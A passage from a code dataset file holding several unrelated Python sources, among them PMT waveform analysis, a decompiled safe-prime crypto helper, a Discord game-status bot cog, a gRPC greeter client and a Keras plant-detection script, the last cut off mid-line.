event_list:\n logger.info('event = {}'.format(event))\n\n PMT, BSL = waveform_panel(pmtrwf,pmtdf,event=event)\n if plot:\n plot_PPMT(PMT, tmin=0, tmax=1000, emin = -10, emax = 20, option='all')\n plt.show()\n wait()\n plot_PPMT(PMT, tmin=0, tmax=1000, emin = -10, emax = 150, option='sum')\n plt.show()\n wait()\n\n s12 = find_S12(wf_thr(sPMT(PMT),threshold=thr_pmt))\n\n logger.debug('length of s12 = {}'.format(len(s12)))\n S1 = []\n S2 = []\n for s in s12:\n logger.debug('evaluating s in s12: s ={}'.format(s.describe()))\n logger.debug('tmax ={}'.format(s.describe().time_mus.max()))\n if s.describe().time_mus.max() < t_trigger: #s1\n S1.append(s)\n else:\n S2.append(s)\n\n logger.debug('length of S1 list = {}'.format(len(S1)))\n logger.debug('length of S2 list = {}'.format(len(S2)))\n\n if (len(S1) == 0):\n logger.warning(\"S1 not found, ignore event\")\n t0[event] = -999\n t[event] = -999\n xb[event] = -999\n yb[event] = -999\n s2e[event] = -999\n s2l[event] = -999\n ns1[event] = 0\n ns2[event] = len(S2)\n continue\n if (len(S2) == 0):\n logger.warning(\"S2 not found, ignore event\")\n t0[event] = -999\n t[event] = -999\n xb[event] = -999\n yb[event] = -999\n s2e[event] = -999\n s2l[event] = -999\n ns1[event] = len(S1)\n ns2[event] = 0\n continue\n\n ns1[event] = len(S1)\n ns2[event] = len(S2)\n\n s1 = S1[0]\n\n if len(S1) > 1:\n cmax = 0\n i=0\n imax = 0\n for s in S1:\n if s.describe().time_mus.count() > cmax:\n cmax = s.describe().time_mus.count()\n imax = i\n i+=1\n s1 = S1[imax]\n\n logger.debug('found s1 = {}'.format(s1.describe()))\n\n\n\n s2 = S2[0]\n es2 = s12_energy(s2)\n\n if len(S2) > 1:\n emax = 0\n i=0\n imax = 0\n for s in S2:\n es2 = s12_energy(s)\n if es2 > emax:\n emax = es2\n imax = i\n i+=1\n s2 = S2[imax]\n\n epmt = energy_sum(PMT, thr=0)\n\n logger.debug('found s2 = {}'.format(s2.describe()))\n\n t0[event] = find_t0(s1)\n t[event] = find_t(s1,s2)\n xb[event], yb[event] = pmt_barycenter(pmtdf, epmt)\n s2l[event] = s12_length(s2)\n\n\n\ndef get_vectors(h5f):\n \"\"\"\n input: file pointer\n returns: data vectors\n \"\"\"\n pmtrwf = h5f.root.RD.pmtrwf\n sipmrwf = h5f.root.RD.sipmrwf\n geom_t = h5f.root.Detector.DetectorGeometry\n pmt_t = h5f.root.Sensors.DataPMT\n sipm_t = h5f.root.Sensors.DataSiPM\n gdf = snf.read_data_geom(geom_t)\n pmtdf = snf.read_data_sensors(pmt_t)\n sipmdf = snf.read_data_sensors(sipm_t)\n return pmtrwf,sipmrwf,pmtdf,sipmdf,gdf\n\ndef get_pmt_vectors(h5f):\n \"\"\"\n input: file pointer\n returns: data vectors\n \"\"\"\n pmtrwf = h5f.root.RD.pmtrwf\n geom_t = h5f.root.Detector.DetectorGeometry\n pmt_t = h5f.root.Sensors.DataPMT\n gdf = snf.read_data_geom(geom_t)\n pmtdf = snf.read_data_sensors(pmt_t)\n return pmtrwf,pmtdf,gdf\n\ndef wfdf(time,energy_pes,indx):\n \"\"\"\n takes three vectors (time, energy and indx) and returns a data frame representing a waveform\n \"\"\"\n swf = {}\n swf['time_mus'] = time/mus\n swf['ene_pes'] = energy_pes\n swf['indx'] = indx\n return pd.DataFrame(swf)\n\ndef waveform_panel(pmtrwf,pmtdf,mau_len = 500, calib_constat =True, adc_to_pes=20,\n type = 'PMT', daq_ceiling=4096, event=0):\n \"\"\"\n input: sensor (pmt or sipm) data vector, sensor data frame (position, calibration)\n returns: a panel holding DataFrames with waveforms for all sensors, and a series for the baselines\n \"\"\"\n PMT = {}\n nm = mau_len\n B_MAU = (1./nm)*np.ones(nm)\n pmt_len = pmtrwf.shape[2]\n NPMT = pmtrwf.shape[1]\n MAU = np.zeros(nm)\n BSL = {}\n\n time_ns = np.arange(pmt_len)*mus\n indx = np.arange(pmt_len)\n\n if type == 'PMT':\n time_ns = np.arange(pmt_len)*FP.time_DAQ\n\n ene_sum = 0\n for j in range(NPMT):\n\n if calib_constat == True:\n adc_to_pes = abs(pmtdf['adc_to_pes'][j])\n\n signal_daq = pmtrwf[event,j]\n if type == 'PMT':\n signal_daq = daq_ceiling - pmtrwf[event,j]\n\n MAU[0:nm] = SGN.lfilter(B_MAU,1, signal_daq[0:nm])\n BASELINE = MAU[nm-1]\n\n ene_pes = (signal_daq - BASELINE)/adc_to_pes\n if type == 'PMT':\n ene_sum += ene_pes\n\n PMT[j] = wfdf(time_ns,ene_pes,indx)\n BSL[j] = BASELINE\n PMT[j+1] = wfdf(time_ns,ene_sum,indx)\n return pd.Panel(PMT),pd.Series(BSL)\ndef plot_PPMT(pmt_panel, tmin=0, tmax=1200, emin = 0, emax = 10000, option='sum'):\n \"\"\"\n Plots pmtwf\n \"\"\"\n plt.figure(figsize=(10,10))\n\n if option == 'sum':\n ax1 = plt.subplot(1,1,1)\n ax1.set_xlim([tmin, tmax])\n ax1.set_ylim([emin, emax])\n indx = pmt_panel.items[-1]\n pmtwf = pmt_panel[indx]\n plt.plot(pmtwf['time_mus'],pmtwf['ene_pes'])\n else:\n\n for i in pmt_panel.items[0:-1]:\n ax1 = plt.subplot(3,4,int(i)+1)\n ax1.set_xlim([tmin, tmax])\n ax1.set_ylim([emin, emax])\n\n pmtwf = pmt_panel[i]\n plt.plot(pmtwf['time_mus'],pmtwf['ene_pes'])\n\n plt.show()\ndef wf_thr(wf,threshold=0):\n \"\"\"\n return a zero supressed waveform (more generally, the vaules of wf above threshold)\n \"\"\"\n return wf.loc[lambda df: df.ene_pes.values >threshold, :]\ndef energy_sum(sensor_panel, thr=0):\n \"\"\"\n Sum the WFs of PMTs and SiPMs (MC) and store the total energy in PES\n \"\"\"\n EPES = []\n\n for i in sensor_panel.items[0:-1]:\n pmtwf = sensor_panel[i]\n EPES.append(np.sum(pmtwf.ene_pes.values[np.where(pmtwf.ene_pes.values>thr)]))\n return pd.Series(EPES)\ndef plot_sensors(geom_df,sensor_df, energy, radius=10):\n \"\"\"\n plots the energy of the sensors\n \"\"\"\n x =sensor_df['x'].values\n y =sensor_df['y'].values\n r =np.ones(len(sensor_df['x'].values))*radius\n\n plt.figure(figsize=(10,10))\n ax = plt.subplot(aspect='equal')\n mpl.circles(x, y, r, c=energy, alpha=0.5, ec='none')\n plt.colorbar()\n\n plt.xlim(geom_df['xdet_min'],geom_df['xdet_max'])\n plt.ylim(geom_df['ydet_min'],geom_df['ydet_max'])\ndef find_S12(swf, stride=40):\n \"\"\"\n Find S1 or S2 signals. The input is a zero-supressed WF. The stride defines the contiguity criterium.\n The stride is applied to the indexes which keep the ordering of the original (non-zs) WF.\n For example, with a stride of 40 (corresponding to steps of 1 mus for a DAQ timing of 25 ns) index 1\n and index 39 are in the same S12.\n \"\"\"\n T = swf['time_mus'].values\n P = swf['ene_pes'].values\n I = swf['indx'].values\n\n S12 = {}\n pulse_on = 1\n j=0\n\n S12[0] = []\n S12[0].append([T[0],P[0],I[0]])\n\n for i in range(1,len(swf)) :\n if swf.index[i]-stride > swf.index[i-1]: #new s12\n j+=1\n S12[j] = []\n S12[j].append([T[i],P[i],I[i]])\n else:\n S12[j].append([T[i],P[i],I[i]])\n\n S12L=[]\n for i in S12.keys():\n S12L.append(pd.DataFrame(S12[i], columns=['time_mus','ene_pes','indx']))\n return S12L\ndef rebin_waveform(swf, stride = 40):\n \"\"\"\n rebins the a waveform according to stride\n The input waveform is a vector such that the index expresses time bin and the\n contents expresses energy (e.g, in pes)\n The function returns a DataFrame. The time bins and energy are rebinned according to stride\n \"\"\"\n\n t = swf['time_mus'].values\n e = swf['ene_pes'].values\n I = swf['indx'].values\n n = len(swf)/int(stride)\n r = len(swf)%int(stride)\n\n lenb = n\n if r > 0:\n lenb = n+1\n\n T = np.zeros(lenb)\n E = np.zeros(lenb)\n II = np.zeros(lenb, dtype=int)\n\n j=0\n for i in range(n):\n E[i] = np.sum(e[j:j+stride])\n T[i] = np.mean(t[j:j+stride])\n II[i] = I[(j+stride)/2]\n j+= stride\n\n if r > 0:\n E[n] = np.sum(e[j:])\n T[n] = np.mean(t[j:])\n II[n] = I[(len(swf) - j/2)]\n\n\n rbw={}\n rbw['ene_pes'] = E\n rbw['time_mus'] = T\n rbw['indx'] = II\n return pd.DataFrame(rbw)\ndef find_t0(s1):\n \"\"\"\n returns t0\n \"\"\"\n emax = np.amax(s1.ene_pes.values)\n return s1.loc[lambda df: df.ene_pes.values ==emax, :]\ndef s12_energy(s12):\n \"\"\"\n total energy in pes\n \"\"\"\n return np.sum(s12.ene_pes.values)\ndef s12_length(s12):\n \"\"\"\n s2 length in mus\n \"\"\"\n\n return s12.describe().time_mus['max'] - s12.describe().time_mus['min']\ndef s12_peak(s12):\n \"\"\"\n s2 peak in mus\n \"\"\"\n\n return s12.describe().time_mus['max'], s12.describe().ene_pes['max']\ndef find_t(s1,s2):\n \"\"\"\n returns the time of the interaction\n \"\"\"\n t0 = find_t0(s1).time_mus.values[0]\n ts2,es2 = s12_peak(s2)\n return ts2 - t0\ndef pmt_barycenter(geom_df,sensor_df, energy):\n \"\"\"\n plots the energy of the sensors\n \"\"\"\n x =sensor_df['x'].values\n y =sensor_df['y'].values\n etot = np.sum(energy)\n xb = np.dot(x,energy)/etot\n yb = np.dot(y,energy)/etot\n\n return xb,yb\n\ndef sPMT(pmt_panel):\n return pmt_panel[pmt_panel.items[-1]]\ndef sipm_corona(esipmzs, sipmdf, n=2):\n pitch = 10*mm\n sipm_max = esipmzs.loc[lambda df: df.values == df.describe().max()]\n\n imax = sipm_max.index[0]\n xmax = sipmdf.ix[imax].x\n ymax = sipmdf.ix[imax].y\n\n CRNA = []\n ALL = []\n\n #print('sipmmax = {}, x = {} mm y = {} mm'.format(imax,xmax,ymax))\n xr = np.arange(xmax - n*pitch, xmax + (n+1)*pitch, pitch)\n yr = np.arange(ymax - n*pitch, ymax + (n+1)*pitch, pitch)\n #print('xr = {}, yr ={}'.format(xr,yr))\n\n for isipm in esipmzs.index:\n x = sipmdf.ix[isipm].x\n y = sipmdf.ix[isipm].y\n #print('sipm = {}, x = {} mm y = {} mm'.format(isipm,x,y))\n\n ALL.append(isipm)\n if x in xr and y in yr:\n CRNA.append(isipm)\n\n #print('CRNA = {}'.format(CRNA))\n #print('ALL = {}'.format(ALL))\n\n #left = np.setdiff1d(np.array(ALL),np.array(CRNA))\n #print('left = {}'.format(left))\n\n xb = 0.\n yb = 0.\n etot = 0.\n for i in CRNA:\n x = sipmdf.ix[i].x\n y = sipmdf.ix[i].y\n e = esipmzs.ix[i]\n xb += x*e\n yb += y*e\n etot+=e\n\n xb/=etot\n yb/=etot\n #print('xb = {}, yb = {}'.format(xb,yb))\n return xb,yb\n","sub_path":"Notebooks/LSC/alpha_pmt.py","file_name":"alpha_pmt.py","file_ext":"py","file_size_in_byte":11807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"501006216","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/martijndevos/Documents/anydex-core/anydex/../pyipv8/ipv8/attestation/wallet/bonehexact/cryptosystem/cryptography_wrapper.py\n# Compiled at: 2019-06-07 08:10:38\nfrom __future__ import absolute_import\nfrom cryptography.hazmat.backends import default_backend\nfrom .....util import cast_to_bin\n\ndef generate_safe_prime(bit_length, backend=default_backend()):\n \"\"\"\n Generate a 'safe' prime p ((p-1)/2 is also prime).\n\n :param bit_length: the length of the generated prime in bits\n :type bit_length: int\n :param backend: the cryptography backend to use\n :type backend: Backend\n :return: the generated prime\n :rtype: int\n \"\"\"\n generated = backend._lib.BN_new()\n err = backend._lib.BN_generate_prime_ex(generated, bit_length, 1, backend._ffi.NULL, backend._ffi.NULL, backend._ffi.NULL)\n if err == 0:\n backend._lib.BN_clear_free(generated)\n raise RuntimeError('Failed to generate prime!')\n generated_hex = backend._lib.BN_bn2hex(generated)\n out = int(backend._ffi.string(generated_hex), 16)\n backend._lib.OPENSSL_free(generated_hex)\n backend._lib.BN_clear_free(generated)\n return out\n\n\ndef is_prime(number, backend=default_backend()):\n \"\"\"\n Check a number for primality.\n\n :param number: the number to check for primality\n :type number: int\n :param backend: the cryptography backend to use\n :type backend: Backend\n :return: True is the n is expected to be prime, False otherwise\n :rtype: bool\n \"\"\"\n hex_n = hex(number)[2:]\n if hex_n.endswith('L'):\n hex_n = hex_n[:-1]\n hex_n = cast_to_bin(hex_n)\n generated = backend._lib.BN_new()\n bn_pp = backend._ffi.new('BIGNUM **', generated)\n err = backend._lib.BN_hex2bn(bn_pp, hex_n)\n if err == 0:\n backend._lib.BN_clear_free(generated)\n raise RuntimeError('Failed to read BIGNUM from hex string!')\n result = backend._lib.BN_is_prime_ex(generated, backend._lib.BN_prime_checks_for_size(int(len(hex_n) * 8)), backend._ffi.NULL, backend._ffi.NULL)\n backend._lib.BN_clear_free(generated)\n if result == 1:\n return True\n return False","sub_path":"pycfiles/anydex-0.1.0-py3-none-any/cryptography_wrapper.py","file_name":"cryptography_wrapper.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4342858","text":"#!/usr/bin/env python\n\"\"\"\nUpdate version string in Info.plist on iOS project.\n\"\"\"\nfrom __future__ import print_function, unicode_literals\n\nimport os\n\nROOT_PATH = os.path.dirname(os.path.dirname(__file__))\n\nINFO_PLIST_PATH = os.path.join(ROOT_PATH, 'sukima/sukima-Info.plist')\nBL_INFO_PLIST_PATH = os.path.join(ROOT_PATH, 'blchan/blchan-info.plist')\n\nPROJECT_FILE_PATH = os.path.join(ROOT_PATH, 'sukima.xcodeproj/project.pbxproj')\n\nPROFILE_APP_STORE = 'PROVISIONING_PROFILE = \"93df057b-6851-4352-86f4-4327af4aa61f\";'\nPROFILE_AD_HOC = 'PROVISIONING_PROFILE = \"160c9225-8a26-4d4a-ac54-f0c0788a4ab8\";'\n\nBL_PROFILE_APP_STORE = 'PROVISIONING_PROFILE = \"8b85505a-24f3-4dd3-9403-58d3d2af07d4\";'\nBL_PROFILE_AD_HOC = 'PROVISIONING_PROFILE = \"4233bc1e-8fec-489a-8575-f7d14cebb82d\";'\n","sub_path":"sukima-ios/tasks/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106342543","text":"# noinspection PyPackageRequirements\nimport asyncio\nimport os\nfrom difflib import SequenceMatcher\n\nimport discord\nfrom discord.ext import commands\n\nfrom utils import helpers\nimport asyncio\nimport functools\n\nimport psutil\n\nfrom utils import Server as srv\nfrom utils import sensor\n\n\nclass Game(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.bot.loop.create_task(self.check_server_running())\n self.bot.loop.create_task(self.get_current_server_status())\n\n @staticmethod\n def wait_or_when_cancelled(process):\n bot_proc = psutil.Process()\n while True:\n try:\n process.wait(timeout=1)\n return\n except psutil.TimeoutExpired:\n if bot_proc.is_running():\n continue\n else:\n return\n\n async def check_server_running(self):\n await self.bot.wait_until_ready(1)\n while not self.bot.is_closed():\n try:\n await asyncio.sleep(1)\n process, data = sensor.get_game_info()\n if process and data:\n self.bot._game_stopped.clear()\n self.bot._game_running.set()\n self.bot.gameinfo = data\n\n self.bot.bprint(f\"Server Status | Now Playing: {data['name']}\")\n await self.bot.loop.run_in_executor(None, functools.partial(self.wait_or_when_cancelled, process))\n self.bot.bprint(f\"Server Status | Offline\")\n\n self.bot._game_running.clear()\n self.bot._game_stopped.set()\n self.bot.gameinfo = None\n except ProcessLookupError:\n await asyncio.sleep(5)\n continue\n except ValueError:\n await asyncio.sleep(5)\n continue\n except AttributeError:\n await asyncio.sleep(5)\n continue\n except Exception as e:\n print(str(type(e)) + \": \" + str(e))\n print(\"This is from the server checker\")\n\n async def get_current_server_status(self):\n await self.bot.wait_until_game_running(1)\n self.bot.game = None\n while not self.bot.is_closed():\n # If game is running upon instantiation\n if self.bot.is_game_running:\n process, data = sensor.get_game_info()\n self.bot.game = srv.generate_server_object(self.bot, process, data)\n await self.bot.wait_until_game_stopped(2)\n\n # Elif no game is running upon instantiation:\n elif self.bot.is_game_stopped:\n self.bot.game = None\n await self.bot.change_presence()\n await self.bot.wait_until_game_running(2)\n\n\ndef setup(bot):\n bot.add_cog(Game(bot))\n","sub_path":"modules/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418945051","text":"import datetime as dt\n\n\ndef dates_between(sdate, edate):\n \"\"\"\n Procedure dates_between\n -----------------------\n Ths procedure returns all of the dates between *sdate* and *edate.\n\n Parameters\n ----------\n sdate: str\n The string containing the start date. The string is formatted\n YYYYMMDD.\n edate: str\n The string containing the end date. The string is formatted\n YYYYMMDD.\n\n Returns\n -------\n all_dates: array of datetimes\n The array containing the dates between *sdate* and *edate*\n \"\"\"\n\n days = dt.datetime.strptime(edate, '%Y%m%d') - \\\n dt.datetime.strptime(sdate, '%Y%m%d')\n\n all_dates = [dt.datetime.strptime(sdate, '%Y%m%d') + dt.timedelta(days=d)\n for d in range(days.days + 1)]\n\n return all_dates\n","sub_path":"act/utils/datetime_utils.py","file_name":"datetime_utils.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337433252","text":"#!/usr/bin/env python\n# Copyright 2015, Google Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"The Python implementation of the GRPC helloworld.Greeter client.\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\n\nimport grpc\n\nimport greeter_pb2\nimport greeter_pb2_grpc\n\n\ndef run(flags):\n # The deadline is absolute - time taken by wait_for_ready is not available to\n # the RPC.\n deadline = time.time() + flags.deadline_ms/1000.0\n\n logging.info('Creating channel to greeter server at %s',\n flags.greeter_server)\n channel = grpc.insecure_channel(flags.greeter_server)\n if flags.wait_for_ready:\n logging.info('Waiting for channel to become ready...')\n try:\n grpc.channel_ready_future(channel).result(timeout=deadline - time.time())\n except:\n # Ignoring timeouts and other errors here.\n pass\n\n logging.info('Creating Greeter stub.')\n stub = greeter_pb2_grpc.GreeterStub(channel)\n\n logging.info('Sending request')\n try:\n response = stub.SayHello(greeter_pb2.HelloRequest(name=flags.user,\n locale=flags.locale),\n timeout=deadline - time.time())\n logging.info('Greeting received: %s', response.message)\n print ('Greeting received: %s' % response.message)\n except grpc.RpcError:\n logging.exception('Failed to fetch greeting:')\n print ('Failed to fetch greeting.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='The greeter client')\n parser.add_argument('--user', default='world',\n help='The user to greet!')\n parser.add_argument('--greeter_server', default='localhost:50051',\n help='Server address of the greeter server.')\n parser.add_argument('--locale', default='en_US',\n help='The locale for the greeting.')\n parser.add_argument('--deadline_ms', type=int, default=20*1000,\n help='Deadline in milliseconds.')\n parser.add_argument('--wait_for_ready',\n type=lambda a: a[0].lower() not in ('0', 'f', 'n'),\n default=True,\n help=('Whether to wait for the backend to become '\n 'available. If false, fails fast.'))\n parser.add_argument('--log_dir', default='',\n help='Server address of the translation server.')\n flags = parser.parse_args()\n logging.basicConfig(\n filename=os.path.join(flags.log_dir, 'greeter_client.py.INFO'),\n format=('%(asctime)s.%(msecs)d %(levelname)s %(module)s:%(lineno)s '\n '%(message)s'),\n datefmt='%Y%m%d %H:%M:%S',\n level=logging.INFO)\n run(flags)\n","sub_path":"grpc/build/greeter_client.py","file_name":"greeter_client.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"218159360","text":"import numpy as np\r\nimport os\r\nfrom os.path import join\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential, model_from_json\r\nfrom keras.layers import Dense, Flatten, BatchNormalization\r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.utils import np_utils\r\nfrom keras.callbacks import TensorBoard, EarlyStopping\r\nimport scipy.ndimage as sn\r\nfrom scipy.misc import imresize\r\nimport time\r\nfrom Utils import read_img, write_txt, std_color\r\nimport argparse\r\nfrom csv2shp import csv2shp\r\nimport cv2\r\nfrom random import choice\r\nimport operator\r\nimport pandas as pd\r\n\r\n# import tensorflow as tf\r\n# from keras.backend.tensorflow_backend import set_session\r\n# config = tf.ConfigProto()\r\n# config.gpu_options.per_process_gpu_memory_fraction = 0.5\r\n# set_session(tf.Session(config=config))\r\n\r\ndef load_image(img_path, patch_radius, resize_rate, plant_color):\r\n img_source = read_img(img_path)\r\n img = np.copy(img_source)\r\n\r\n if not resize_rate == 1:\r\n height, width = img_source.shape[:2]\r\n img = cv2.resize(img_source, (int(width*resize_rate), int(height*resize_rate)))\r\n if len(img.shape) == 3:\r\n pad_width = ((patch_radius, patch_radius), (patch_radius, patch_radius), (0, 0))\r\n else:\r\n pad_width = ((patch_radius, patch_radius), (patch_radius, patch_radius))\r\n img_pad = np.lib.pad(img, pad_width, 'symmetric')\r\n img_pad = std_color(img_pad, plant_color)\r\n return img, img_pad/255, img_source\r\n\r\ndef plant_detect(img_path, model_name, plant_distance, row_distance, threshold, save_img_path = 'default', info = 1, display = 1):\r\n start = time.clock()\r\n\r\n dirname = os.path.split(img_path)[0]\r\n basename = os.path.split(img_path)[1]\r\n filename = os.path.splitext(basename)[0]\r\n ext = os.path.splitext(basename)[1]\r\n if ext == '.tif' or ext == '.tiff':\r\n plant_id = os.path.split(dirname)[1]\r\n show_img = 0\r\n else:\r\n plant_id = os.path.split(os.path.split(dirname)[0])[1]\r\n show_img = 1\r\n if display == 0:\r\n show_img = 0\r\n model_path = join('models', model_name)\r\n\r\n path = join('tmp', plant_id, 'result')\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n\r\n json_file = open(model_path + '.json', 'r')\r\n loaded_model_json = json_file.read()\r\n json_file.close()\r\n model = model_from_json(loaded_model_json)\r\n model.load_weights(model_path +'.h5')\r\n\r\n df = pd.read_csv('plant_info.csv')\r\n df_plant = df[df['plant_id'] == int(plant_id)]\r\n resize_rate = float(df_plant['resize_rate'])\r\n resize_rate = min(resize_rate, 1.5)\r\n plant_color = int(df_plant['plant_color'])\r\n\r\n patch_size = 45\r\n patch_radius = int((patch_size-1)/2)\r\n channel = 3\r\n output_shape = int(model.output.shape[3])\r\n labels = [1]\r\n num_label = len(labels)\r\n detect_size = 1000\r\n input_detect_size = detect_size + 2 * patch_radius\r\n\r\n img, img_pad, img_source = load_image(img_path, patch_radius, resize_rate, plant_color)\r\n if info:\r\n print(img_path, img_pad.shape)\r\n\r\n rows, cols = img.shape[:2]\r\n rows_pad, cols_pad = img_pad.shape[:2]\r\n prob_map = np.zeros([rows, cols, num_label])\r\n max_map = np.zeros([rows, cols])\r\n max_index = np.zeros([rows, cols]).astype(np.uint8)\r\n if max(img.shape) < detect_size:\r\n input_image = np.expand_dims(img_pad, axis = 0)\r\n prob = model.predict(input_image)\r\n prob = np.squeeze(prob)\r\n prob_map = prob[:, :, labels]\r\n else:\r\n if np.min(img_pad)<1:\r\n for r in range(0, rows, detect_size):\r\n for c in range(0, cols, detect_size):\r\n rr = min(r+input_detect_size, rows_pad)\r\n cr = min(c+input_detect_size, cols_pad)\r\n input_image = np.zeros((input_detect_size, input_detect_size, 3))\r\n input_image[:rr-r, :cr-c] = img_pad[r:rr, c:cr]\r\n if np.min(input_image)<1:\r\n input_image = np.expand_dims(input_image, axis = 0)\r\n prob = model.predict(input_image)\r\n prob = np.squeeze(prob)\r\n rr = min(r+detect_size, rows)\r\n cr = min(c+detect_size, cols)\r\n prob_map[r:rr, c:cr, :] = prob[:rr-r, :cr-c, labels]\r\n\r\n max_index_temp = prob_map>0.5\r\n max_map_temp = prob_map * max_index_temp\r\n max_map = np.sum(max_map_temp, axis = 2)\r\n max_index = np.dot(max_index_temp, range(1, len(labels)+1))\r\n\r\n sigma = plant_distance/5\r\n prob_gau = sn.gaussian_filter(max_map, sigma, mode='mirror')\r\n prob_fil = sn.rank_filter(prob_gau, -2, footprint=np.ones([plant_distance, plant_distance]))\r\n mask = np.logical_and(prob_gau > prob_fil, max_map >= threshold)\r\n max_index *= mask\r\n\r\n good_hits = []\r\n bad_hits = []\r\n good_hits_temp = []\r\n row_distance /= 2\r\n\r\n for label_id in range(1, num_label+1):\r\n good_hit = []\r\n bad_hit = []\r\n good_hit_temp = []\r\n same_index = (max_index == label_id)\r\n\r\n idx = np.where(same_index > 0)\r\n if row_distance > 0:\r\n for i in range(len(idx[0])):\r\n x = idx[0][i]\r\n y = idx[1][i]\r\n rl = max(int(x-row_distance), 0)\r\n rr = min(int(x+row_distance), rows)\r\n cl = max(int(y-row_distance), 0)\r\n cr = min(int(y+row_distance), cols)\r\n x_resized = int(x/resize_rate)\r\n y_resized = int(y/resize_rate)\r\n if np.sum(same_index[rl:rr,cl:cr]) > 1:\r\n good_hit_temp.append([x,y])\r\n good_hit.append([x_resized,y_resized])\r\n else:\r\n bad_hit.append([x_resized,y_resized])\r\n else:\r\n for i in range(len(idx[0])):\r\n x = idx[0][i]\r\n y = idx[1][i]\r\n x_resized = int(x/resize_rate)\r\n y_resized = int(y/resize_rate)\r\n good_hit_temp.append([x,y])\r\n good_hit.append([x_resized,y_resized])\r\n good_hits += good_hit\r\n good_hits_temp += good_hit_temp\r\n bad_hits += bad_hit\r\n num_good_hit = len(good_hit)\r\n num_bad_hit = len(bad_hit)\r\n if info:\r\n print('Plant {} has {}, {} of them are bad hits'.format(label_id, np.sum(same_index), np.sum(num_bad_hit)))\r\n\r\n good_hits = np.array(good_hits)\r\n bad_hits = np.array(bad_hits)\r\n\r\n if len(good_hits) > 0:\r\n save_path = os.path.join('tmp', plant_id, 'result', filename + '.txt')\r\n write_txt(save_path, good_hits, way='w')\r\n if len(bad_hits) > 0:\r\n bad_save_path = os.path.join('tmp', plant_id, 'result', filename + '_bad.txt')\r\n write_txt(bad_save_path, bad_hits, way='w')\r\n\r\n if (ext == '.tif' or ext == '.tiff') and show_img == 0:\r\n geo_path = os.path.join('tmp', plant_id, filename) + '.geojson'\r\n csv2shp(save_path, geo_path, img_path)\r\n print('Saved geojson file')\r\n\r\n num_plant = len(good_hits)\r\n print(\"{} detected {} plants.\".format(img_path, num_plant))\r\n if info:\r\n m, s = divmod(time.clock() - start, 60)\r\n h, m = divmod(m, 60)\r\n print(\"Run time: {}:{}:{}\".format(int(h), int(m), int(s)))\r\n\r\n if show_img:\r\n mark_size = 2\r\n plant_region = cv2.inRange(max_map, threshold, 1)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n mask_gray = np.copy(img)\r\n mask_color = np.copy(img_source)\r\n for r in range(rows):\r\n for c in range(cols):\r\n if plant_region[r, c] == 0:\r\n mask_gray[r, c, :] = gray[r, c]\r\n if not resize_rate == 1:\r\n height, width = img_source.shape[:2]\r\n mask_gray = cv2.resize(mask_gray, (width, height))\r\n color_range = range(255)\r\n color = np.zeros([num_label, 3])\r\n for i in range(num_label):\r\n color[i] = [choice(color_range), choice(color_range), choice(color_range)]\r\n\r\n for x, y in good_hits_temp:\r\n index = max_index[int(x),int(y)] - 1\r\n x = int(x/resize_rate)\r\n y = int(y/resize_rate)\r\n mask_gray[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,255] #color[index]\r\n mask_color[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,255] #color[index]\r\n for x, y in bad_hits:\r\n mask_gray[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,0]\r\n mask_color[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,0]\r\n\r\n if num_plant > 